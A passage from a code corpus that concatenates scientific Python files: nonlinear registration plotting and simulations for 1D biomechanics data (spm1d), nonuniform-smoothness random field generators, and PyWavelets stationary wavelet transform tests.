h1 = ax.plot(self.q, y1.mean(axis=0), color=colors[1], lw=5)[0]
ax.legend([h0,h1], [f'Group {self.ug[0]} mean', f'Group {self.ug[1]} mean'])
ax.set_title( self.name )
class Besier2009VastusForce(_Dataset):
fpath = os.path.join( dirDATA, 'Besier2009-vastus.csv' )
class Dorn2012(_Dataset):
fpath = os.path.join( dirDATA, 'Dorn2021-reduced.npz' )
def _load(self):
with np.load( self.fpath, allow_pickle=True ) as z:
self.group = z['speed']
self.dv = z['y']
class Pataky2014MediolateralCOP(_Dataset):
fpath = os.path.join( dirDATA, 'Pataky2014-mediolateral.csv' )
class SimulatedA(_Dataset):
fpath = os.path.join( dirDATA, 'SimulatedA.csv' )
class SimulatedB(_Dataset):
fpath = os.path.join( dirDATA, 'SimulatedB.csv' )
```
#### File: nlreg1d/nlreg1d/plot.py
```python
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import patches
import spm1d
def axes2data(ax, points):
ax.get_xlim()
ax.get_ylim()
t = ax.transAxes + ax.transData.inverted()
return t.transform( points )
def data2axes(ax, points):
ax.get_xlim()
ax.get_ylim()
t = (ax.transAxes + ax.transData.inverted()).inverted()
return t.transform( points )
def plot_multipanel(y, yr, d, n0, colors, parametric=True, ylim=None, alpha_x=None, paired=False, permutations=1000, dvlabel='Dependent variable', xlabel='Domain position (%)', group_labels=None, leg_loc=[(0.99, 0.92), (0.99, 0.92), (0.99, 0.99)]):
d = d[:,1:-1]
Y = np.dstack( [yr[:,1:-1],d] )
J = n0
fontname = 'Helvetica'
glabels = ['Group 1 mean', 'Group 2 mean'] if (group_labels is None) else group_labels
# stats:
if parametric:
if paired:
ti = spm1d.stats.ttest_paired( y[J:], y[:J] ).inference(0.05)
T2i = spm1d.stats.hotellings_paired( Y[J:], Y[:J] ).inference(0.05)
tri = spm1d.stats.ttest_paired( yr[J:], yr[:J] ).inference(0.05/2)
twi = spm1d.stats.ttest_paired( d[J:], d[:J] ).inference(0.05/2)
else:
ti = spm1d.stats.ttest2( y[J:], y[:J] ).inference(0.05)
T2i = spm1d.stats.hotellings2( Y[J:], Y[:J] ).inference(0.05)
tri = spm1d.stats.ttest2( yr[J:], yr[:J] ).inference(0.05/2)
twi = spm1d.stats.ttest2( d[J:], d[:J] ).inference(0.05/2)
else:
if paired:
t = spm1d.stats.nonparam.ttest_paired( y[J:], y[:J] )
T2 = spm1d.stats.nonparam.hotellings_paired( Y[J:], Y[:J] )
tr = spm1d.stats.nonparam.ttest_paired( yr[J:], yr[:J] )
tw = spm1d.stats.nonparam.ttest_paired( d[J:], d[:J] )
else:
t = spm1d.stats.nonparam.ttest2( y[J:], y[:J] )
T2 = spm1d.stats.nonparam.hotellings2( Y[J:], Y[:J] )
tr = spm1d.stats.nonparam.ttest2( yr[J:], yr[:J] )
tw = spm1d.stats.nonparam.ttest2( d[J:], d[:J] )
nperm = -1 if (permutations > t.nPermUnique) else permutations
ti = t.inference(0.05, iterations=nperm, two_tailed=True)
T2i = T2.inference(0.05, iterations=nperm)
tri = tr.inference(0.05, iterations=nperm, two_tailed=True)
twi = tw.inference(0.05, iterations=nperm, two_tailed=True)
# nperm0 = -1 if (permutations > t.nPermUnique) else permutations
# nperm1 = -1 if (permutations > T2.nPermUnique) else permutations
# nperm2 = -1 if (permutations > tr.nPermUnique) else permutations
# nperm3 = -1 if (permutations > tw.nPermUnique) else permutations
# create figure and axes:
fig = plt.figure( figsize=(14,10) )
axw,axh = 0.26, 0.27
# axx = np.linspace( 0.06, 0.42, 0.71)
axx = [0.085, 0.415, 0.730]
axy = np.linspace(0.66, 0.06, 3)
ax0,ax1,ax2 = [plt.axes( [x,axy[0],axw,axh] ) for x in axx]
ax3 = plt.axes( [axx[0],axy[2],axw,axh] )
ax4 = plt.axes( [axx[1]+0.15,axy[1],axw,axh] )
ax5,ax6 = [plt.axes( [x,axy[2],axw,axh] ) for x in axx[1:]]
AX = [ax0,ax1,ax2, ax3, ax4, ax5,ax6]
h0 = ax0.plot( y[:J].T, color=colors[0], lw=0.3 )[0]
h1 = ax0.plot( y[J:].T, color=colors[1], lw=0.3 )[0]
h0 = ax0.plot( y[:J].mean(axis=0), color=colors[0], lw=5 )[0]
h1 = ax0.plot( y[J:].mean(axis=0), color=colors[1], lw=5 )[0]
leg = ax0.legend( [h0,h1], glabels, loc='upper right', bbox_to_anchor=leg_loc[0] )
plt.setp( leg.get_texts(), name=fontname)
ax1.plot( yr[:J].T, color=colors[0], lw=0.3 )
ax1.plot( yr[J:].T, color=colors[1], lw=0.3 )
h0 = ax1.plot( yr[:J].mean(axis=0), color=colors[0], lw=5 )[0]
h1 = ax1.plot( yr[J:].mean(axis=0), color=colors[1], lw=5 )[0]
leg = ax1.legend( [h0,h1], glabels, loc='upper right', bbox_to_anchor=leg_loc[1] )
plt.setp( leg.get_texts(), name=fontname)
h0 = ax2.plot( d[:J].T, color=colors[0], lw=0.3 )[0]
h1 = ax2.plot( d[J:].T, color=colors[1], lw=0.3 )[0]
h2 = ax2.axhline(0, color='k', ls='--')
h0 = ax2.plot( d[:J].mean(axis=0), color=colors[0], lw=5 )[0]
h1 = ax2.plot( d[J:].mean(axis=0), color=colors[1], lw=5 )[0]
leg = ax2.legend( [h0,h1,h2], glabels + ['Null displacement'], loc='upper right', bbox_to_anchor=leg_loc[2] )
plt.setp( leg.get_texts(), name=fontname)
# SPM results:
ti.plot( ax=ax3 )
T2i.plot( ax=ax4 )
tri.plot( ax=ax5 )
twi.plot( ax=ax6 )
# init axes decorations:
for ax in AX:
plt.setp( ax.get_xticklabels() + ax.get_yticklabels(), name=fontname, size=10 )
ax.set_xlim(0, 100)
ax.set_ylabel(None)
[ax.set_xticklabels([]) for ax in [ax1,ax2,ax4]]
# axis labels:
sz = 16
ax0.set_ylabel(dvlabel, name=fontname, size=sz)
ax1.set_ylabel(dvlabel, name=fontname, size=sz)
ax2.set_ylabel('Warp magnitude', name=fontname, size=sz)
ax3.set_ylabel('SPM{t}', name=fontname, size=sz)
ax4.set_ylabel(r'SPM{ $T^2$ }', name=fontname, size=sz)
ax5.set_ylabel('SPM{t}', name=fontname, size=sz)
[ax.set_xlabel(xlabel, name=fontname, size=sz) for ax in [ax3,ax5,ax6]]
# panel labels:
labels = ['A.1', 'B.1', 'B.2', 'A.2', 'B.3', 'B.4', 'B.5']
slabels = ['Linearly registered', 'Nonlinearly registered', 'Displacement fields', 'Statistical analysis', 'Main test (amplitude + timing)', 'Post hoc (amplitude)', 'Post hoc (timing)']
[ax.text(0.03, 0.92, f'({s}) {ss}', name=fontname, size=14, transform=ax.transAxes) for ax,s,ss in zip( AX, labels, slabels ) ]
tx0 = ax1.text(0.01, 1.05, 'Amplitude effects', ha='left', transform=ax1.transAxes)
tx1 = ax2.text(0.99, 1.05, 'Timing effects', ha='right', transform=ax2.transAxes)
plt.setp( [tx0,tx1] , name=fontname, size=16 )
# background panels:
c0,c1 = '0.6', '0.9'
patch0 = patches.Rectangle([0.035,0.005], 0.328, 0.99, facecolor=c0, edgecolor=c0, alpha=0.9, zorder=-1)
patch1 = patches.Rectangle([0.370,0.005], 0.628, 0.99, facecolor=c1, edgecolor=c1, alpha=0.9, zorder=-1)
tx0 = fig.text(0.20, 0.97, '(A) Common univariate approach', ha='center')
# tx1 = fig.text(0.20, 0.48, '( No explicit temporal\neffect consideration )', ha='center')
tx1 = fig.text(0.20, 0.48, '( None )', ha='center')
tx2 = fig.text(0.55, 0.97, '(B) Proposed multivariate approach')
fig.add_artist(patch0)
fig.add_artist(patch1)
plt.setp( [tx0, tx1, tx2], name=fontname, size=20)
x = 0.01
y = np.array(axy) + 0.5*axh
tx0 = fig.text(x, y[0], 'Dependent variables')
tx1 = fig.text(x, y[1], 'Multivariate analysis')
tx2 = fig.text(x, y[2], 'Univariate analysis')
plt.setp( [tx0, tx1, tx2], name=fontname, size=20, rotation=90, va='center')
# tx1.set_size=14
# axis limits:
if ylim is not None:
[ax.set_ylim(*yy) for ax,yy in zip(AX, ylim)]
def add_threshold_label(ax, x0, ti):
s0,s1 = r'$\alpha$ < 0.05', r'$\alpha$ > 0.05'
hax = 0.02
x,y0 = data2axes( ax, [x0, ti.zstar] )
tx0 = ax.text(x, y0+hax, s0, va='bottom')
tx1 = ax.text(x, y0-hax, s1, va='top')
tx = [tx0,tx1]
plt.setp( tx, size=11, name=fontname, transform=ax.transAxes)
return tx
# add threshold labels:
if alpha_x is not None:
add_threshold_label( ax3, alpha_x[0], ti )
add_threshold_label( ax4, alpha_x[1], T2i )
add_threshold_label( ax5, alpha_x[2], tri )
add_threshold_label( ax6, alpha_x[3], twi )
return fig,AX
```
#### File: nlreg1d/Scripts/sim_warps.py
```python
import numpy as np
from matplotlib import pyplot as plt
from spm1d import rft1d
import nlreg1d as nl
def tstat(y): # one-sample t statistic
return y.mean(axis=0) / y.std(ddof=1, axis=0) * (y.shape[0]**0.5)
def estimate_lkc(r):
'''
Estimate the Lipschitz-Killing curvature of a set of resoduals
Reference:
Taylor (2008) "Random fields of multivariate test statistics"
'''
def _norm(a):
return (a**2).sum(axis=0)**0.5
q = np.diff( r / _norm(r).T , axis=1 )
lkc = _norm( q ).sum()
return lkc
def sim(nsim=200, shape_parameter=0.1, n_random=25, u=np.linspace(2, 5, 21)):
tmax = [] # maximum t-value
fwhme = [] # estimated FWHM
lkce = [] # estimate LKC
for i in range(nsim):
w = nl.random_warp( J, Q, sigma=3, shape_parameter=shape_parameter, n_random=n_random, as_warp_object=True )
# y = w.get_deviation_from_linear_time()[:,1:-1]
y = w.get_displacement_field()[:,1:-1]
r = y - y.mean(axis=0) # residuals
t = tstat( y )
tmax.append( t.max() )
fwhme.append( nl.util.estimate_fwhm(r) )
lkce.append( estimate_lkc(r) )
tmax = np.array(tmax)
# geometry summary:
fwhmE = np.mean( fwhme )
lkcE = np.mean( lkce )
# survival functions:
sf = np.array( [ (tmax>uu).mean() for uu in u] ) # simulation results
sfe = rft1d.t.sf(u, v, Q, fwhmE) # expected
return fwhmE, lkcE, sf,sfe
# set parameters:
np.random.seed(12345)
J = 12 # number of observations
Q = 101 # number of grid points
v = J - 1 # degress of freedom
nsim = 200 # number of simulated datasets (change this to 10000 to replicate the results in: ./Figures/sim-results.pdf)
u = np.linspace(1, 5, 21) # thresholds for survival function calculation
sps = [10, 1, 0.1, 0.01] # shape_parameter values
nrs = [3, 6, 15, 50] # n_random values
# run simulation:
fwhms,lkcs = [],[]
sfs,sfes = [],[]
for sp,nr in zip(sps,nrs):
results = sim(nsim, shape_parameter=sp, n_random=nr, u=u)
fwhms.append( results[0] )
lkcs.append( results[1] )
sfs.append( results[2] )
sfes.append( results[3] )
# plot:
plt.close('all')
fig,axs = plt.subplots( 2, 2, figsize=(8,6) )
plt.get_current_fig_manager().window.move(0, 0)
fontname = 'Helvetica'
colors = ['r', 'g', 'b', 'k']
for ax,sf,sfe,lkc,fwhm,c in zip(axs.ravel(), sfs, sfes, lkcs, fwhms, colors):
h0 = ax.plot(u, sfe, '-', color=c, label='Theoretical')[0]
h1 = ax.plot(u, sf, 'o', color=c, label='Simulated')[0]
ax.text(0.6, 0.98, 'LKC = %.1f\nFWHM = %.1f'%(lkc,fwhm), transform=ax.transAxes, va='top', color=c, name=fontname)
ax.set_ylim(0, 0.3)
ax.grid(axis='x', color='0.9')
ax.grid(axis='y', color='0.9')
if ax==axs[0,1]:
leg = ax.legend(loc='lower left')
plt.setp( leg.get_texts(), name=fontname, size=10 )
[plt.setp(ax.get_xticklabels()+ax.get_yticklabels(), name=fontname, size=8) for ax in axs.ravel()]
[ax.set_xticklabels([]) for ax in axs[0]]
[ax.set_yticklabels([]) for ax in axs[:,1]]
[ax.set_xlabel(r'$u$', name=fontname, size=14) for ax in axs[1]]
[ax.set_ylabel(r'$P(t_\max > u)$', name=fontname, size=14) for ax in axs[:,0]]
[ax.text(0.03, 0.92, '(%s)'%chr(97+i), name=fontname, size=12, transform=ax.transAxes) for i,ax in enumerate(axs.ravel())]
plt.tight_layout()
plt.show()
``` |
{
"source": "0todd0000/nonuniform1d",
"score": 2
} |
#### File: 0todd0000/nonuniform1d/fig03_terminology2D.py
```python
from math import pi
import numpy as np
from scipy import signal
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import pyplot,cm
import spm1d #www.spm1d.org
import nonuniform1d #(in this repository)
def fn_mypulse2D(x, y, F, lamx, lamy):
return (float(F)/(lamx*lamy)) * (1+ np.cos(2*pi/lamx*x)) * (1+ np.cos(2*pi/lamy*y))
def gen_mypulse2D(F, lamx, lamy, dt=0.1):
tx,ty = np.arange(-lamx/2, lamx/2+dt, dt), np.arange(-lamy/2, lamy/2+dt, dt)
X,Y = np.meshgrid(tx,ty)
Z = fn_mypulse2D(X, Y, F, lamx, lamy)
return X,Y,Z #N/mm2
#(0) Isotropic 2D data:
np.random.seed(0)
m,n = 128,128
I = np.random.randn(m,n)
lam0x,lam0y = 35,35
dt = 1.0
Z0 = gen_mypulse2D(15, lam0x, lam0y, dt)[-1]
I0 = 1.2*signal.convolve2d(I, Z0, boundary='symm', mode='same')
#(1) Nonisotropic 2D data:
np.random.seed(2)
I1 = np.random.randn(m,n)
np.random.seed(1)
I2 = np.random.randn(m,n)
lam1x,lam1y = 80,10
lam2x,lam2y = 10,80
dt = 1.0
Z1 = gen_mypulse2D(15, lam1x, lam1y, dt)[-1]
Z2 = gen_mypulse2D(15, lam2x, lam2y, dt)[-1]
I1 = signal.convolve2d(I1, Z1, boundary='symm', mode='same')
I2 = signal.convolve2d(I2, Z2, boundary='symm', mode='same')
#(2) Plot:
# pyplot.close('all')
fontname = 'Times New Roman'
vmin,vmax = -2, 2
### create figure and axes:
axx = [0.069,0.40]
axy = np.linspace(0.71,0.07,3)
axw = [0.25, 0.55]
axh = [0.25, 0.3]
fig = pyplot.figure(figsize=(7,7))
fig.canvas.set_window_title('Figure 3')
ax1 = [pyplot.axes([axx[1],yy,axw[1],axh[1]], projection='3d') for yy in axy-0.04]
ax0 = [pyplot.axes([axx[0],yy,axw[0],axh[0]]) for yy in axy]
AX = np.array([ax0,ax1]).T
### set fonts and sizes:
[pyplot.setp(ax.get_xticklabels()+ax.get_yticklabels(), name=fontname, size=8) for ax in AX[:,0]]
[pyplot.setp(ax.get_xticklabels()+ax.get_yticklabels()+ax.get_zticklabels(), name=fontname, size=8) for ax in AX[:,1]]
### plot images:
ticks = [0, 32, 64, 96, 128]
ticklabels = ['0', '', '0.5', '', '1']
for ax,I in zip(AX[:,0],[I0,I1,I2]):
ax.imshow(I, cmap='gray', vmin=vmin, vmax=vmax, origin='lower')
ax.set_xticks(ticks)
ax.set_yticks(ticks)
ax.set_xticklabels(ticklabels)
ax.set_yticklabels(ticklabels)
ax.set_xlabel('X', name=fontname, size=14)
ax.set_ylabel('Y', name=fontname, size=14)
cbs = [pyplot.colorbar(cax=pyplot.axes([0.33,yy,0.025,axh[0]]), mappable=AX[0,0].images[0]) for yy in axy]
[pyplot.setp(cb.ax.get_yticklabels(), name=fontname, size=8) for cb in cbs]
[cb.ax.set_ylabel('DV value', name=fontname, size=14) for cb in cbs]
### plot surfaces:
X = np.linspace(0, 1, m)
Y = np.linspace(0, 1, n)
X, Y = np.meshgrid(Y, X)
ticks = [0, 0.25, 0.5, 0.75, 1]
ticklabels = ['0', '', '0.5', '', '1']
for ax,I in zip(AX[:,1],[I0,I1,I2]):
surf = ax.plot_surface(X, Y, I, rstride=3, cstride=3, cmap=cm.gray_r, linewidth=0.2, edgecolor='0.7', antialiased=True)
pyplot.setp(ax, xticks=ticks, yticks=ticks, xticklabels=ticklabels, yticklabels=ticklabels)
pyplot.setp(ax, xlim=(0,1), ylim=(0,1), zlim=(-15,15))
ax.set_xlabel('X', name=fontname, size=14)
ax.set_ylabel('Y', name=fontname, size=14)
ax.set_zlabel('DV value', name=fontname, size=14)
### add panel labels:
labels = 'Isotropic', 'Nonisotriopic (X smoother)', 'Nonisotriopic (Y smoother)'
yloc = [1.14, 1.00, 1.00]
for i,(ax,label,yy) in enumerate(zip(AX[:,0], labels, yloc)):
ax.text(1.32, yy, '(%s) %s' %(chr(97+i), label), name=fontname, size=14, transform=ax.transAxes, va='top', bbox=dict(color='w', alpha=0.5))
### annotate:
yloc = [0.65, 0.33]
for yy in yloc:
AX[0,0].annotate("", xy=(0, yy), xycoords='figure fraction', xytext=(1, yy), textcoords='figure fraction', arrowprops=dict(arrowstyle="-", color='0.7') )
pyplot.show()
```
#### File: 0todd0000/nonuniform1d/nonuniform1d.py
```python
from math import sqrt,log
import numpy as np
from matplotlib import pyplot
eps = np.finfo(np.float).eps
def gaussian_kernel(sd):
'''
Create a Gaussian kernel with the specified standard deviation (sd)
Modified from scipy.ndimage.filters.gaussian_filter1d
'''
kw = int(4.0 * sd + 0.5) #kernel width
weights = [0.0] * (2 * kw + 1)
weights[kw] = 1.0
sum = 1.0
sd = sd * sd
# calculate the kernel:
for ii in range(1, kw + 1):
tmp = np.exp(-0.5 * float(ii * ii) / sd)
weights[kw + ii] = tmp
weights[kw - ii] = tmp
sum += 2.0 * tmp
for ii in range(2 * kw + 1):
weights[ii] /= sum
return np.array(weights)
def fwhm_exponential(Q, w0, w1):
'''
Exponential smoothness model
Parameters:
Q : number of continuum nodes
w0 : initial smoothness value
w1 : final smoothness value
'''
x = np.linspace(-2, 2, Q)
fwhm = np.exp(x)
fwhm = w0 + w1 * fwhm/fwhm[-1]
return fwhm
def fwhm_gaussian(Q, q, sd, w0, w1):
'''
Gaussian pulse smoothness model
Parameters:
Q : number of continuum nodes
q : location of Gaussian kernel center
sd : standard deviation of the kernel
w0 : baseline smoothness value
w1 : maximum smoothness value
'''
y = np.zeros(Q)
g = gaussian_kernel(sd)
n = g.size
i0 = q - int(n/2)
i1 = q + int(n/2) + 1
if i0 < 0:
n2crop = abs(i0)
i0 = 0
g = g[n2crop:]
if i1 > Q:
n2crop = i1 - Q
i1 = Q
g = g[:-n2crop]
y[i0:i1] = g
amp = w1 - w0
fwhm = w0 + y * amp / y.max()
return fwhm
def fwhm_linear(Q, w0, w1, q0=None, q1=None):
'''
Linear smoothness model
Parameters:
Q : number of continuum nodes
w0 : initial smoothness value
w1 : final smoothness value
q0 : optional starting node for linear increase
q1 : optional ending node for linear increase
'''
q0 = 0 if (q0 is None) else q0
q1 = Q if (q1 is None) else q1
width = q1 - q0
wstep = np.linspace(w0, w1, width)
w = w0 * np.ones(Q)
w[q0:q1] = wstep
w[q1:] = w1
return w
def fwhm_step(Q, w0, w1):
'''
Sigmoid step smoothness model
Parameters:
Q : number of continuum nodes
w0 : initial smoothness value
w1 : final smoothness value
'''
dx = 5
x = np.linspace(-5, 5, Q)
fwhm = w0 + (w1-w0) / (1 + np.exp(-dx*x))
return fwhm
def fwhm_double_step(Q, w0, w1, w2):
'''
Double sigmoid step smoothness model
Parameters:
Q : number of continuum nodes
w0 : initial smoothness value
w1 : intermediary smoothness value
w2 : final smoothness value
'''
dx = 5
n = int(Q/2)
n0,n1 = (n+1,n) if Q%2 else (n,n)
x0 = np.linspace(-5, +2.5, n0)
x1 = np.linspace(-2.4, +5, n1)
fwhm0 = w0 + (w1-w0) / (1 + np.exp(-dx*x0))
fwhm1 = w1 + (w2-w1) / (1 + np.exp(-dx*x1))
fwhm = np.hstack([fwhm0,fwhm1])
return fwhm
def generate_fwhm_continuum(type='linear', *args):
'''
Generate a 1D FWHM continuum as a model of underlying data smoothness
Parameters:
type : one of ["linear", "exponential", "gaussian", "step", "double step"]
args : model-dependent arguments; see documentation from fwhm* functions
'''
if type=='double_step':
fn = fwhm_double_step
if type=='linear':
fn = fwhm_linear
elif type=='exponential':
fn = fwhm_exponential
elif type=='step':
fn = fwhm_step
elif type=='gaussian':
fn = fwhm_gaussian
return fn(*args)
def estimate_fwhm(R, mean=True):
resels = estimate_resels(R, mean=False)
fwhm = 1 / resels
if mean:
fwhm = fwhm.mean()
return fwhm
def estimate_resels(R, mean=True):
'''
Estimate local continuum smoothness.
NOTE: Only use this function to approximate local smoothness!
Robust smoothness estimation must be done only at the continuum level,
as implemented in **spm1d.rft1d.geom.estimate_fwhm***
This code is adapted from **spm1d.rft1d.geom.estimate_fwhm**
'''
ssq = (R**2).sum(axis=0)
### gradient estimation (Method 2)
dy,dx = np.gradient(R)
v = (dx**2).sum(axis=0)
# normalize:
v /= (ssq + eps)
# ignore zero-variance nodes:
i = np.isnan(v)
v = v[np.logical_not(i)]
# global resels estimate:
resels = np.sqrt(v / (4*log(2)))
if mean:
resels = resels.mean()
return resels
def randn1dnu(J, FWHM):
'''
Nonuniformly smooth 1D Gaussian random continuum generator
Parameters:
J : sample size (integer)
FWHM : one-dimensional NumPy array representing continuum smoothness
Outputs:
y : a random sample of J continua, each with length FWHM.size
'''
Q = FWHM.size
z = np.random.randn(Q, J)
s = FWHM / ( (Q-1) * sqrt( 4*log(2) ) )
dx = 1. / (Q -1)
x = np.array([dx * np.arange(Q)])
X = np.repeat(x, Q, 0)
D = X - np.repeat(x.T, Q, 1) #; %distance matrix (relative to diagonal nodes)
A = np.exp(-0.5*D**2 / (s**2) )
[U,V] = np.linalg.eig(A.T)
U,V = np.real(U), np.real(V)
U[U<eps] = 0
U,V = np.matrix(np.diag( np.sqrt(U) )), np.matrix(V)
C = V * U * V.T
y = (C * z).T
return np.asarray(y)
``` |
{
"source": "0-tree/pywt",
"score": 2
} |
#### File: pywt/tests/test_swt.py
```python
from __future__ import division, print_function, absolute_import
import warnings
from copy import deepcopy
from itertools import combinations
import numpy as np
from numpy.testing import (run_module_suite, dec, assert_allclose, assert_,
assert_equal, assert_raises, assert_array_equal,
assert_warns)
import pywt
from pywt._extensions._swt import swt_axis
# Check that float32 and complex64 are preserved. Other real types get
# converted to float64.
dtypes_in = [np.int8, np.float16, np.float32, np.float64, np.complex64,
np.complex128]
dtypes_out = [np.float64, np.float32, np.float32, np.float64, np.complex64,
np.complex128]
# tolerances used in accuracy comparisons
tol_single = 1e-6
tol_double = 1e-13
####
# 1d multilevel swt tests
####
def test_swt_decomposition():
x = [3, 7, 1, 3, -2, 6, 4, 6]
db1 = pywt.Wavelet('db1')
atol = tol_double
(cA3, cD3), (cA2, cD2), (cA1, cD1) = pywt.swt(x, db1, level=3)
expected_cA1 = [7.07106781, 5.65685425, 2.82842712, 0.70710678,
2.82842712, 7.07106781, 7.07106781, 6.36396103]
assert_allclose(cA1, expected_cA1, rtol=1e-8, atol=atol)
expected_cD1 = [-2.82842712, 4.24264069, -1.41421356, 3.53553391,
-5.65685425, 1.41421356, -1.41421356, 2.12132034]
assert_allclose(cD1, expected_cD1, rtol=1e-8, atol=atol)
expected_cA2 = [7, 4.5, 4, 5.5, 7, 9.5, 10, 8.5]
assert_allclose(cA2, expected_cA2, rtol=tol_double, atol=atol)
expected_cD2 = [3, 3.5, 0, -4.5, -3, 0.5, 0, 0.5]
assert_allclose(cD2, expected_cD2, rtol=tol_double, atol=atol)
expected_cA3 = [9.89949494, ] * 8
assert_allclose(cA3, expected_cA3, rtol=1e-8, atol=atol)
expected_cD3 = [0.00000000, -3.53553391, -4.24264069, -2.12132034,
0.00000000, 3.53553391, 4.24264069, 2.12132034]
assert_allclose(cD3, expected_cD3, rtol=1e-8, atol=atol)
# level=1, start_level=1 decomposition should match level=2
res = pywt.swt(cA1, db1, level=1, start_level=1)
cA2, cD2 = res[0]
assert_allclose(cA2, expected_cA2, rtol=tol_double, atol=atol)
assert_allclose(cD2, expected_cD2, rtol=tol_double, atol=atol)
coeffs = pywt.swt(x, db1)
assert_(len(coeffs) == 3)
assert_(pywt.swt_max_level(len(x)), 3)
def test_swt_max_level():
# odd sized signal will warn about no levels of decomposition possible
assert_warns(UserWarning, pywt.swt_max_level, 11)
with warnings.catch_warnings():
warnings.simplefilter('ignore', UserWarning)
assert_equal(pywt.swt_max_level(11), 0)
# no warnings when >= 1 level of decomposition possible
assert_equal(pywt.swt_max_level(2), 1) # divisible by 2**1
assert_equal(pywt.swt_max_level(4*3), 2) # divisible by 2**2
assert_equal(pywt.swt_max_level(16), 4) # divisible by 2**4
assert_equal(pywt.swt_max_level(16*3), 4) # divisible by 2**4
def test_swt_axis():
x = [3, 7, 1, 3, -2, 6, 4, 6]
db1 = pywt.Wavelet('db1')
(cA2, cD2), (cA1, cD1) = pywt.swt(x, db1, level=2)
# test cases use 2D arrays based on tiling x along an axis and then
# calling swt along the other axis.
for order in ['C', 'F']:
# test SWT of 2D data along default axis (-1)
x_2d = np.asarray(x).reshape((1, -1))
x_2d = np.concatenate((x_2d, )*5, axis=0)
if order == 'C':
x_2d = np.ascontiguousarray(x_2d)
elif order == 'F':
x_2d = np.asfortranarray(x_2d)
(cA2_2d, cD2_2d), (cA1_2d, cD1_2d) = pywt.swt(x_2d, db1, level=2)
for c in [cA2_2d, cD2_2d, cA1_2d, cD1_2d]:
assert_(c.shape == x_2d.shape)
# each row should match the 1D result
for row in cA1_2d:
assert_array_equal(row, cA1)
for row in cA2_2d:
assert_array_equal(row, cA2)
for row in cD1_2d:
assert_array_equal(row, cD1)
for row in cD2_2d:
assert_array_equal(row, cD2)
# test SWT of 2D data along other axis (0)
x_2d = np.asarray(x).reshape((-1, 1))
x_2d = np.concatenate((x_2d, )*5, axis=1)
if order == 'C':
x_2d = np.ascontiguousarray(x_2d)
elif order == 'F':
x_2d = np.asfortranarray(x_2d)
(cA2_2d, cD2_2d), (cA1_2d, cD1_2d) = pywt.swt(x_2d, db1, level=2,
axis=0)
for c in [cA2_2d, cD2_2d, cA1_2d, cD1_2d]:
assert_(c.shape == x_2d.shape)
# each column should match the 1D result
for row in cA1_2d.transpose((1, 0)):
assert_array_equal(row, cA1)
for row in cA2_2d.transpose((1, 0)):
assert_array_equal(row, cA2)
for row in cD1_2d.transpose((1, 0)):
assert_array_equal(row, cD1)
for row in cD2_2d.transpose((1, 0)):
assert_array_equal(row, cD2)
# axis too large
assert_raises(ValueError, pywt.swt, x, db1, level=2, axis=5)
def test_swt_iswt_integration():
# This function performs a round-trip swt/iswt transform test on
# all available types of wavelets in PyWavelets - except the
# 'dmey' wavelet. The latter has been excluded because it does not
# produce very precise results. This is likely due to the fact
# that the 'dmey' wavelet is a discrete approximation of a
# continuous wavelet. All wavelets are tested up to 3 levels. The
# test validates neither swt or iswt as such, but it does ensure
# that they are each other's inverse.
max_level = 3
wavelets = pywt.wavelist(kind='discrete')
if 'dmey' in wavelets:
# The 'dmey' wavelet seems to be a bit special - disregard it for now
wavelets.remove('dmey')
for current_wavelet_str in wavelets:
current_wavelet = pywt.Wavelet(current_wavelet_str)
input_length_power = int(np.ceil(np.log2(max(
current_wavelet.dec_len,
current_wavelet.rec_len))))
input_length = 2**(input_length_power + max_level - 1)
X = np.arange(input_length)
coeffs = pywt.swt(X, current_wavelet, max_level)
Y = pywt.iswt(coeffs, current_wavelet)
assert_allclose(Y, X, rtol=1e-5, atol=1e-7)
def test_swt_dtypes():
wavelet = pywt.Wavelet('haar')
for dt_in, dt_out in zip(dtypes_in, dtypes_out):
errmsg = "wrong dtype returned for {0} input".format(dt_in)
# swt
x = np.ones(8, dtype=dt_in)
(cA2, cD2), (cA1, cD1) = pywt.swt(x, wavelet, level=2)
assert_(cA2.dtype == cD2.dtype == cA1.dtype == cD1.dtype == dt_out,
"swt: " + errmsg)
# swt2
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
x = np.ones((8, 8), dtype=dt_in)
cA, (cH, cV, cD) = pywt.swt2(x, wavelet, level=1)[0]
assert_(cA.dtype == cH.dtype == cV.dtype == cD.dtype == dt_out,
"swt2: " + errmsg)
def test_swt_roundtrip_dtypes():
# verify perfect reconstruction for all dtypes
rstate = np.random.RandomState(5)
wavelet = pywt.Wavelet('haar')
for dt_in, dt_out in zip(dtypes_in, dtypes_out):
# swt, iswt
x = rstate.standard_normal((8, )).astype(dt_in)
c = pywt.swt(x, wavelet, level=2)
xr = pywt.iswt(c, wavelet)
assert_allclose(x, xr, rtol=1e-6, atol=1e-7)
# swt2, iswt2
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
x = rstate.standard_normal((8, 8)).astype(dt_in)
c = pywt.swt2(x, wavelet, level=2)
xr = pywt.iswt2(c, wavelet)
assert_allclose(x, xr, rtol=1e-6, atol=1e-7)
def test_swt2_ndim_error():
x = np.ones(8)
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
assert_raises(ValueError, pywt.swt2, x, 'haar', level=1)
@dec.slow
def test_swt2_iswt2_integration(wavelets=None):
# This function performs a round-trip swt2/iswt2 transform test on
# all available types of wavelets in PyWavelets - except the
# 'dmey' wavelet. The latter has been excluded because it does not
# produce very precise results. This is likely due to the fact
# that the 'dmey' wavelet is a discrete approximation of a
# continuous wavelet. All wavelets are tested up to 3 levels. The
# test validates neither swt2 or iswt2 as such, but it does ensure
# that they are each other's inverse.
max_level = 3
if wavelets is None:
wavelets = pywt.wavelist(kind='discrete')
if 'dmey' in wavelets:
# The 'dmey' wavelet is a special case - disregard it for now
wavelets.remove('dmey')
for current_wavelet_str in wavelets:
current_wavelet = pywt.Wavelet(current_wavelet_str)
input_length_power = int(np.ceil(np.log2(max(
current_wavelet.dec_len,
current_wavelet.rec_len))))
input_length = 2**(input_length_power + max_level - 1)
X = np.arange(input_length**2).reshape(input_length, input_length)
with warnings.catch_warnings():
warnings.simplefilter('ignore', FutureWarning)
coeffs = pywt.swt2(X, current_wavelet, max_level)
Y = pywt.iswt2(coeffs, current_wavelet)
assert_allclose(Y, X, rtol=1e-5, atol=1e-5)
def test_swt2_iswt2_quick():
test_swt2_iswt2_integration(wavelets=['db1', ])
def test_swt2_axes():
atol = 1e-14
current_wavelet = pywt.Wavelet('db2')
